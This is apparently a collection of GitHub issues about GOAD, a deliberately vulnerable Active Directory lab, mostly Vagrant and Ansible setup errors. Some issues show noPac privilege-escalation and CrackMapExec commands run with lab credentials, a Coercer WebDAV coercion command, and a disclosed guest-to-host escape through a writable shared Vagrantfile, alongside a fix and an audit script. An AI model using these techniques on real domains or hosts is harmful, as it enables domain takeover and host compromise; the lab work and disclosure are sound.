76: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/commands/halt/command.rb:30:in `execute'
75: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/plugin/v2/command.rb:232:in `with_target_vms'
74: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/plugin/v2/command.rb:232:in `each'
73: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/plugin/v2/command.rb:243:in `block in with_target_vms'
72: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/commands/halt/command.rb:31:in `block in execute'
71: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/machine.rb:203:in `action'
70: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/machine.rb:203:in `call'
69: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/environment.rb:631:in `lock'
68: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/machine.rb:217:in `block in action'
67: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/machine.rb:248:in `action_raw'
66: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in `run'
65: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/util/busy.rb:19:in `busy'
64: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in `block in run'
63: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builder.rb:180:in `call'
62: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in `call'
61: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/providers/virtualbox/action/check_virtualbox.rb:26:in `call'
60: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in `call'
59: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builtin/call.rb:53:in `call'
58: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in `run'
57: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/util/busy.rb:19:in `busy'
56: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in `block in run'
55: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builder.rb:180:in `call'
54: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in `call'
53: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:127:in `block in finalize_action'
52: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in `call'
51: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/providers/virtualbox/action/check_accessible.rb:18:in `call'
50: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in `call'
49: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/providers/virtualbox/action/discard_state.rb:15:in `call'
48: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in `call'
47: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builtin/call.rb:53:in `call'
46: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in `run'
45: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/util/busy.rb:19:in `busy'
44: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in `block in run'
43: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builder.rb:180:in `call'
42: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in `call'
41: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:127:in `block in finalize_action'
40: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in `call'
39: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:127:in `block in finalize_action'
38: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in `call'
37: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builtin/call.rb:43:in `call'
36: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in `run'
35: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/util/busy.rb:19:in `busy'
34: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in `block in run'
33: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builder.rb:180:in `call'
32: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in `call'
31: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builtin/graceful_halt.rb:50:in `call'
30: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/machine.rb:283:in `guest'
29: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/communicators/winrm/communicator.rb:106:in `ready?'
28: from /opt/vagrant/embedded/lib/ruby/2.7.0/timeout.rb:110:in `timeout'
27: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/communicators/winrm/communicator.rb:107:in `block in ready?'
26: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/communicators/winrm/shell.rb:70:in `cmd'
25: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/connection.rb:42:in `shell'
24: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/communicators/winrm/shell.rb:71:in `block in cmd'
23: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/communicators/winrm/shell.rb:138:in `execute_with_rescue'
22: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/communicators/winrm/shell.rb:144:in `handle_output'
21: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/shells/base.rb:79:in `run'
20: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/shells/base.rb:128:in `with_command_shell'
19: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/shells/base.rb:168:in `open'
18: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/shells/retryable.rb:35:in `retryable'
17: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/shells/base.rb:170:in `block in open'
16: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/shells/cmd.rb:54:in `open_shell'
15: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/http/transport.rb:168:in `send_request'
14: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/http/transport.rb:236:in `init_auth'
13: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient.rb:765:in `post'
12: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient.rb:856:in `request'
11: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient.rb:1014:in `do_request'
10: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient.rb:1133:in `protect_keep_alive_disconnected'
9: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient.rb:1019:in `block in do_request'
8: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient.rb:1245:in `do_get_block'
7: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient.rb:1299:in `do_get_header'
6: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient/session.rb:561:in `get_header'
5: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient/session.rb:784:in `read_header'
4: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient/session.rb:801:in `parse_header'
3: from /opt/vagrant/embedded/lib/ruby/2.7.0/timeout.rb:105:in `timeout'
2: from /opt/vagrant/embedded/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'
1: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient/session.rb:805:in `block in parse_header'
/opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient/session.rb:805:in `gets': execution expired (Timeout::Error)
fatal: [172.24.126.10]: FAILED! => {"changed": true, "msg": "Failed to install ADDSForest, DCPromo exited with 54: The operation failed with the following error:\r\n\r\nThe specified procedure could not be found.\r\n", "reboot_required": false}
Any info on this one ?
Many thanks for the project !
How can I change the installation path for all Vagrant VMs? I wanna set up the lab in a separate SSD partition.
I have the same issue as #17, but I can't apply the solution which solved the problem, as I can't downgrade Vagrant to this old version, and if I downgrade Vagrant I must also downgrade VirtualBox to an old version like 6.0. Here is the error:
Post Ansible config of the server, I circled back to configure ELK; however, it fails when checking if Chocolatey is installed, with the following error:
fatal: [192.168.56.11]: FAILED! => {"changed": false, "command": "C:\ProgramData\chocolatey\bin\choco.exe install chocolatey-core.extension --fail-on-unfound --yes --no-progress --limit-output --timeout 2700", "msg": "Error installing package(s) 'chocolatey-core.extension'", "rc": 1, "stderr": "", "stderr_lines": [], "stdout": "Installing the following packages:\r\nchocolatey-core.extension\r\nBy installing, you accept licenses for the packages.\r\nchocolatey-core.extension not installed. An error occurred during installation:\r\n The remote server returned an error: (429) Too Many Requests. Too Many Requests\r\nchocolatey-core.extension package files install failed with exit code 1. Performing other installation steps.\r\nThe install of chocolatey-core.extension was NOT successful.\r\nchocolatey-core.extension not installed. An error occurred during installation:\r\n The remote server returned an error: (429) Too Many Requests. Too Many Requests\r\n\r\nChocolatey installed 0/1 packages. 1 packages failed.\r\n See the log for details (C:\ProgramData\chocolatey\logs\chocolatey.log).\r\n\r\nFailures\r\n - chocolatey-core.extension (exited 1) - chocolatey-core.extension not installed. An error occurred during installation:\r\n The remote server returned an error: (429) Too Many Requests. Too Many Requests\r\n", "stdout_lines": ["Installing the following packages:", "chocolatey-core.extension", "By installing, you accept licenses for the packages.", "chocolatey-core.extension not installed. An error occurred during installation:", " The remote server returned an error: (429) Too Many Requests. Too Many Requests", "chocolatey-core.extension package files install failed with exit code 1. Performing other installation steps.", "The install of chocolatey-core.extension was NOT successful.", "chocolatey-core.extension not installed. An error occurred during installation:", " The remote server returned an error: (429) Too Many Requests. 
Too Many Requests", "", "Chocolatey installed 0/1 packages. 1 packages failed.", " See the log for details (C:\ProgramData\chocolatey\logs\chocolatey.log).", "", "Failures", " - chocolatey-core.extension (exited 1) - chocolatey-core.extension not installed. An error occurred during installation:", " The remote server returned an error: (429) Too Many Requests. Too Many Requests"]}
It does, however, appear to work on SRV03!
Hello,
Thanks for all the work in this repo.
I got an error with the noPac vulns (CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user)
└─# python3 noPac.py essos.local/viserys.targaryen:GoldCrown -dc-ip 192.168.56.12
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target meereen.essos.local
[*] Total Domain Admins 2
[*] will try to impersonat daenerys.targaryen
[*] Adding Computer Account "WIN-D8KGLE4YSFE$"
[*] MachineAccount "WIN-D8KGLE4YSFE$" password = FXGlOanW(foZ
[*] Successfully added machine account WIN-D8KGLE4YSFE$ with password FXGlOanW(foZ.
[*] WIN-D8KGLE4YSFE$ object = CN=WIN-D8KGLE4YSFE,CN=Computers,DC=essos,DC=local
[-] Cannot rename the machine account , Reson 00000524: UpdErr: DSID-031A11E2, problem 6005 (ENTRY_EXISTS), data 0
[*] Attempting to del a computer with the name: WIN-D8KGLE4YSFE$
[-] Delete computer WIN-D8KGLE4YSFE$ Failed! Maybe the current user does not have permission.
It seems that the server is vulnerable for cme ...
└─# cme smb 192.168.56.12 -u viserys.targaryen -p GoldCrown -M nopac
SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
NOPAC 192.168.56.12 445 MEEREEN TGT with PAC size 1534
NOPAC 192.168.56.12 445 MEEREEN TGT without PAC size 729
NOPAC 192.168.56.12 445 MEEREEN
NOPAC 192.168.56.12 445 MEEREEN VULNEABLE
NOPAC 192.168.56.12 445 MEEREEN Next step: https://github.com/Ridter/noPac
Did I do something wrong?
I also tried with this known repo: https://github.com/WazeHell/sam-the-admin
A+
This lab is awesome! I've been playing around with it for a bit now.
It would be great for people to try the WebDAV coerced auth trick somewhere in the lab. E.g.
./Coercer.py -wh hackerbox -t braavos -u <essos_user> -p <user_pass>
By default this will not work. The target must have the WebClient service enabled. This service does not exist by default on Windows Servers, so to get it, we'd need to add the WebDAV Redirector role/feature. We then set the WebClient service to start on boot.
Performing this coerced auth would tie in nicely with the RBCD attack against Meereen & Braavos.
Keen to hear your thoughts. 🙂
Thanks for creating such a wonderful lab. Environment configured and working well except for this one error:
TASK [member_server : Add member server] ************************************************
ok: [192.168.56.23]
fatal: [192.168.56.22]: FAILED! => {"changed": true, "msg": "failed to join domain: Computer 'castelblack' failed to join domain 'north.sevenkingdoms.local' from its current workgroup 'WORKGROUP' with following error message: The specified network name is no longer available.", "reboot_required": false}
System details:
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.04.6 LTS
Release: 18.04
Codename: bionic
$ vagrant --version
Vagrant 2.2.19
$ vboxmanage --version
6.1.34r150636
$ ansible --version
ansible [core 2.12.6]
config file = /home/user/GOAD/ansible/ansible.cfg
configured module search path = ['/home/user/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules']
ansible python module location = /home/user/GOAD/ansible/.venv/lib/python3.8/site-packages/ansible
ansible collection location = /home/user/.ansible/collections:/usr/share/ansible/collections
executable location = /home/user/GOAD/ansible/.venv/bin/ansible
python version = 3.8.0 (default, Dec 9 2021, 17:53:27) [GCC 8.4.0]
jinja version = 3.1.2
libyaml = True
Happy to provide whatever extra information might be required to investigate and resolve.
Vagrant synced folders are enabled, allowing trivial breakout of the environment by modifying the shared Vagrantfile file, leading to execution of arbitrary Ruby code on the host running Vagrant when the GOAD user runs any vagrant command from within the goad directory (such as vagrant status) or child directories.
Shared folders are enabled:
user@dev-ubuntu:~/vagrant/goad$ vagrant --version
Vagrant 2.3.1
user@dev-ubuntu:~/vagrant/goad$ vagrant up
[...]
==> DC01: Mounting shared folders...
DC01: /vagrant => /home/user/vagrant/goad
We can write to contents of shared folders from the C:\vagrant directory within a GOAD virtual machine.
Ruby code inserted into the Vagrantfile from within a virtual machine is executed when a user runs vagrant commands:
user@dev-ubuntu:~/vagrant/goad$ ls pwned
ls: cannot access 'pwned': No such file or directory
user@dev-ubuntu:~/vagrant/goad$ vagrant status
bcoles was here 2022
Current machine states:
DC01 running (virtualbox)
DC02 running (virtualbox)
DC03 running (virtualbox)
SRV02 running (virtualbox)
SRV03 running (virtualbox)
This environment represents multiple VMs. The VMs are all listed
above with their current state. For more information about a specific
VM, run `vagrant status NAME`.
user@dev-ubuntu:~/vagrant/goad$ cat pwned
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),138(libvirt)
user@dev-ubuntu:~/vagrant/goad$
There may be a way to exploit this without waiting for user interaction (perhaps symlinks as per below) but I haven't looked into it. It is likely that users will eventually run vagrant status or vagrant halt.
Additionally, GOAD is an intentionally vulnerable environment. Numerous user accounts and services are configured with publicly documented default credentials. GOAD exposes various network services (such as RDP) to the LAN, allowing access to the vulnerable hosts on the virtual LAN using default credentials.
user@dev-ubuntu:~/vagrant/goad$ vagrant up DC01
Bringing machine 'DC01' up with 'virtualbox' provider...
==> DC01: Checking if box 'StefanScherer/windows_2019' version '2021.05.15' is up to date...
==> DC01: Clearing any previously set forwarded ports...
==> DC01: Clearing any previously set network interfaces...
==> DC01: Preparing network interfaces based on configuration...
DC01: Adapter 1: nat
DC01: Adapter 2: hostonly
==> DC01: Forwarding ports...
DC01: 3389 (guest) => 3389 (host) (adapter 1)
DC01: 5985 (guest) => 55985 (host) (adapter 1)
DC01: 5986 (guest) => 55986 (host) (adapter 1)
DC01: 22 (guest) => 2222 (host) (adapter 1)
==> DC01: Running 'pre-boot' VM customizations...
==> DC01: Booting VM...
==> DC01: Waiting for machine to boot. This may take a few minutes...
DC01: WinRM address: 127.0.0.1:55985
DC01: WinRM username: vagrant
DC01: WinRM execution_time_limit: PT2H
DC01: WinRM transport: negotiate
==> DC01: Machine booted and ready!
==> DC01: Checking for guest additions in VM...
==> DC01: Configuring and enabling network interfaces...
==> DC01: Mounting shared folders...
DC01: /vagrant => /home/user/vagrant/goad
==> DC01: Machine already provisioned. Run `vagrant provision` or use the `--provision`
==> DC01: flag to force provisioning. Provisioners marked to run always will still run.
user@dev-ubuntu:~/vagrant/goad$ netstat -an | grep 3389
tcp 0 0 0.0.0.0:3389 0.0.0.0:* LISTEN
$ sudo lsof -i :3389
[sudo] password for user:
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
VBoxHeadl 9592 user 20u IPv4 79136 0t0 TCP *:ms-wbt-server (LISTEN)
Remote network access to these services combined with writable Shared Folders effectively allows remote exploitation of the host running GOAD.
As far as I'm aware shared folders are not required. If shared folders are not required, the default vagrant share should be explicitly disabled:
diff --git a/Vagrantfile b/Vagrantfile
index 47b3b77..99a6627 100644
--- a/Vagrantfile
+++ b/Vagrantfile
@@ -38,6 +38,8 @@ boxes = [
# { :name => "SRV03", :ip => "192.168.56.23", :box => "jborean93/WindowsServer2016", :os => "windows"}
# ]
+ config.vm.synced_folder '.', '/vagrant', disabled: true
+
config.vm.provider "virtualbox" do |v|
v.memory = 3000
v.cpus = 2
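Review bot: the added config.vm.synced_folder '.', '/vagrant', disabled: true line has no comment saying why the default share is turned off, so a later edit could drop or re-enable it without anyone noticing that it protects the host's Vagrantfile from the guests; add a one-line comment above it. The setting is also applied once on the global config.vm, and this hunk does not show the per-machine definitions built from the boxes list, so the description should state how the change was verified (for example, that "Mounting shared folders..." no longer appears for any machine) before this is merged.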
In theory the above change should be sufficient - although when I tried applying the above change the shared folder was still mounted. Perhaps it needs to be disabled for each box.
Additionally, if shared folders are required, ensure symlinks are disabled for all shared folders:
config.vm.synced_folder '.', '/a-shared-path', SharedFoldersEnableSymlinksCreate: false
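The two checks this report calls for, as an added example that is not part of the original issue or of the GOAD project: a text-only audit of a Vagrantfile for an enabled default /vagrant share or a share lacking SharedFoldersEnableSymlinksCreate: false, and a parse of vagrant up output to confirm what was actually mounted (the reporter saw the share still mounted after the change). The function names and the sample inputs are constructed for illustration.

```ruby
# Added example: heuristic audit of Vagrant synced-folder exposure.
# It matches text only and never evaluates the Vagrantfile it inspects.

# Anchored at line start, so commented-out declarations do not match.
SYNCED_RE = /^\s*(\w+)\.vm\.synced_folder\s+(['"])(.*?)\2\s*,\s*(['"])(.*?)\4(.*)$/

# One hash per active synced_folder declaration in the Vagrantfile text.
def parse_synced_folders(vagrantfile_text)
  vagrantfile_text.each_line.with_index(1).filter_map do |line, lineno|
    m = SYNCED_RE.match(line)
    next unless m
    opts = m[6]
    { line: lineno, scope: m[1], host_path: m[3], guest_path: m[5],
      disabled: opts.match?(/(?:\bdisabled:|:disabled\s*=>)\s*true\b/),
      symlinks_off: opts.match?(/\bSharedFoldersEnableSymlinksCreate:\s*false\b/) }
  end
end

# Findings for the two settings discussed in the report.
def audit_vagrantfile(vagrantfile_text)
  folders = parse_synced_folders(vagrantfile_text)
  findings = []
  # Vagrant shares the project directory at /vagrant unless told otherwise.
  unless folders.any? { |f| f[:guest_path] == '/vagrant' && f[:disabled] }
    findings << 'default /vagrant share is not explicitly disabled'
  end
  folders.reject { |f| f[:disabled] }.each do |f|
    next if f[:symlinks_off]
    findings << "line #{f[:line]}: share #{f[:guest_path]} does not set " \
                'SharedFoldersEnableSymlinksCreate: false'
  end
  findings
end

# Shares reported under "Mounting shared folders..." in `vagrant up` output.
def mounted_shares(vagrant_output)
  shares = []
  in_mount_section = false
  vagrant_output.each_line do |line|
    if line.match?(/^==>\s+\S+:\s+Mounting shared folders/)
      in_mount_section = true
    elsif line.start_with?('==>')
      in_mount_section = false
    elsif in_mount_section && (m = line.match(/^\s*(\S+):\s+(\S+)\s+=>\s+(\S+)\s*$/))
      shares << { machine: m[1], guest_path: m[2], host_path: m[3] }
    end
  end
  shares
end

# Mounted shares whose host side is the project directory or a parent of it,
# i.e. shares through which a guest can reach the host's Vagrantfile.
def shares_exposing_project(shares, project_dir)
  project = File.expand_path(project_dir)
  shares.select do |s|
    host = File.expand_path(s[:host_path])
    project == host || project.start_with?(host + '/')
  end
end

# Constructed sample: no synced_folder line at all (default share active).
SAMPLE_BEFORE = <<~'RUBY'
  Vagrant.configure("2") do |config|
    config.vm.provider "virtualbox" do |v|
      v.memory = 3000
    end
  end
RUBY

# Constructed sample: default share disabled, one extra share left loose.
SAMPLE_AFTER = <<~'RUBY'
  Vagrant.configure("2") do |config|
    config.vm.synced_folder '.', '/vagrant', disabled: true
    config.vm.synced_folder './share', '/a-shared-path'
  end
RUBY

# Constructed sample modelled on the `vagrant up` output quoted in the report.
SAMPLE_UP_OUTPUT = <<~'OUT'
  ==> DC01: Forwarding ports...
      DC01: 3389 (guest) => 3389 (host) (adapter 1)
  ==> DC01: Mounting shared folders...
      DC01: /vagrant => /home/user/vagrant/goad
  ==> DC01: Machine already provisioned.
OUT

if __FILE__ == $PROGRAM_NAME
  puts audit_vagrantfile(SAMPLE_BEFORE)
  puts audit_vagrantfile(SAMPLE_AFTER)
  exposed = shares_exposing_project(mounted_shares(SAMPLE_UP_OUTPUT),
                                    '/home/user/vagrant/goad')
  exposed.each { |s| puts "#{s[:machine]} can write to #{s[:host_path]}" }
end
```

Running the output check after every Vagrantfile change catches the case where the configuration says the share is disabled but a machine still mounts it.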
I keep on running into these issues:
servers.yml:
TASK [mssql : Add MSSQL admin] *****************************************************************
failed: [192.168.56.22] (item=NORTH\jon.snow) => {"ansible_loop_var": "item", "changed": true, "cmd": "SqlCmd -E -Q "CREATE LOGIN [NORTH\jon.snow] FROM WINDOWS"\nSqlCmd -E -Q "SP_ADDSRVROLEMEMBER 'NORTH\jon.snow','SYSADMIN'"", "delta": "0:00:18.890751", "end": "2022-11-15 15:52:04.494095", "item": "NORTH\jon.snow", "msg": "non-zero return code", "rc": 1, "start": "2022-11-15 15:51:45.603343", "stderr": "Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Named Pipes Provider: Could not open a connection to SQL Server [2]. .\r\nSqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Login timeout expired.\r\nSqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online..\r\nSqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Named Pipes Provider: Could not open a connection to SQL Server [2]. .\r\nSqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Login timeout expired.\r\nSqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online..", "stderr_lines": ["Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Named Pipes Provider: Could not open a connection to SQL Server [2]. .", "Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Login timeout expired.", "Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. 
Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online..", "Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Named Pipes Provider: Could not open a connection to SQL Server [2]. .", "Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Login timeout expired.", "Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online.."], "stdout": "", "stdout_lines": []}
ad-relations.yml
TASK [groups_domains : Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}}] ***
ok: [192.168.56.11] => (item={'key': 'AcrossTheSea', 'value': ['essos.local\daenerys.targaryen']})
ok: [192.168.56.12] => (item={'key': 'DragonsFriends', 'value': ['sevenkingdoms.local\tyron.lannister', 'essos.local\daenerys.targaryen']})
FAILED - RETRYING: [192.168.56.10]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).
ok: [192.168.56.12] => (item={'key': 'Spys', 'value': ['sevenkingdoms.local\Small Council']})
FAILED - RETRYING: [192.168.56.10]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (2 retries left).
FAILED - RETRYING: [192.168.56.10]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (1 retries left).
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.10] (item={'key': 'AcrossTheNarrowSea', 'value': ['essos.local\daenerys.targaryen']}) => {"ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "AcrossTheNarrowSea", "value": ["essos.local\daenerys.targaryen"]}, "msg": "Unhandled exception while executing module: A call to SSPI failed, see inner exception."}
FYI, I'm looking into running the lab on a Mac M1 using Parallels instead of VirtualBox (not sure if that's even possible).
The first issue I ran into is the fact that there are no boxes available for the Parallels provider.
I checked to see if I could build them myself and ran into this issue: StefanScherer/packer-windows#320
We can keep this issue open to track the progress.
This issue is just in case someone attempts to do the same thing. I did not go further.
VMware Fusion: 13.0.0
Vagrant: 2.3.4
OS: Ventura
❯ vagrant up --provider vmware_desktop
Bringing machine 'DC01' up with 'vmware_desktop' provider...
Bringing machine 'DC02' up with 'vmware_desktop' provider...
Bringing machine 'DC03' up with 'vmware_desktop' provider...
Bringing machine 'SRV02' up with 'vmware_desktop' provider...
Bringing machine 'SRV03' up with 'vmware_desktop' provider...
==> DC01: Box 'StefanScherer/windows_2019' could not be found. Attempting to find and install...
DC01: Box Provider: vmware_desktop, vmware_fusion, vmware_workstation
DC01: Box Version: 2021.05.15
==> DC01: Loading metadata for box 'StefanScherer/windows_2019'
DC01: URL: https://vagrantcloud.com/StefanScherer/windows_2019
==> DC01: Adding box 'StefanScherer/windows_2019' (v2021.05.15) for provider: vmware_desktop
DC01: Downloading: https://vagrantcloud.com/StefanScherer/boxes/windows_2019/versions/2021.05.15/providers/vmware_desktop.box
==> DC01: Successfully added box 'StefanScherer/windows_2019' (v2021.05.15) for 'vmware_desktop'!
==> DC01: Cloning VMware VM: 'StefanScherer/windows_2019'. This can take some time...
==> DC01: Checking if box 'StefanScherer/windows_2019' version '2021.05.15' is up to date...
==> DC01: Verifying vmnet devices are healthy...
Vagrant failed to create a new VMware networking device. The following
error message was generated while attempting to create a new device:
Networks with custom subnet/mask values are not supported on this platform
Please resolve any problems reported in the error message above and
try again.
Requirements:
Install the vagrant plugin for the vmware provider:
vagrant plugin install vagrant-vmware-desktop
Install Vagrant VMware Utility (invalid certificate cf: hashicorp/vagrant-vmware-desktop#56):
There's an error while creating users arya.stark, eddard.stark, catelyn.stark and robb.stark.
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at , : line 475
failed: [192.168.56.11] (item={'key': 'arya.stark', 'value': {'firstname': 'Arya', 'surname': 'Stark',
...
"msg": "Unhandled exception while executing module: The term 'Add-Warning' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."}+
Thanks in advance.
I am getting these 2 errors in the ansible-playbook main command:
TASK [settings/hostname : Reboot if needed] ****************************************************************************************************************************************
changed: [192.168.56.12]
changed: [192.168.56.23]
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: Exception: Timed out waiting for last boot time check (timeout=600.0)
